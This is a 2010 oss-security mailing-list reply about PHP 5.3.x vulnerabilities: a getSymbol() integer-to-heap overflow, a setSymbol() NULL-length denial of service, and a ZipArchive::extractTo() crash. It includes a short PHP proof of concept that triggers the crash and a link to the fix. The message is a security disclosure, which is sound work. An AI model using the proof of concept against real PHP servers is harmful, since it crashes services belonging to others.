Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 7 Dec 2010 22:43:17 +0000 (UTC)
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900)

Tomas Hoger <thoger@...> writes:

> Btw, setSymbol() is affected too, and does not seem to be addressed in
> r305571.  In both cases, it's PHP exposing ICU bug.
> 


setSymbol() give only DoS with strlen(NULL) [CWE-170].
getSymbol() Integer overflow which causes heap overflow.

see also ZipArchive:extractTo()
Possible CWE-170 strlen(NULL)

PoC:
<?php

$zip = new ZipArchive;
$zip->open('./dupa.zip');
var_dump($zip->extractTo('/tmp', array('', '')));


?>

Fix:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.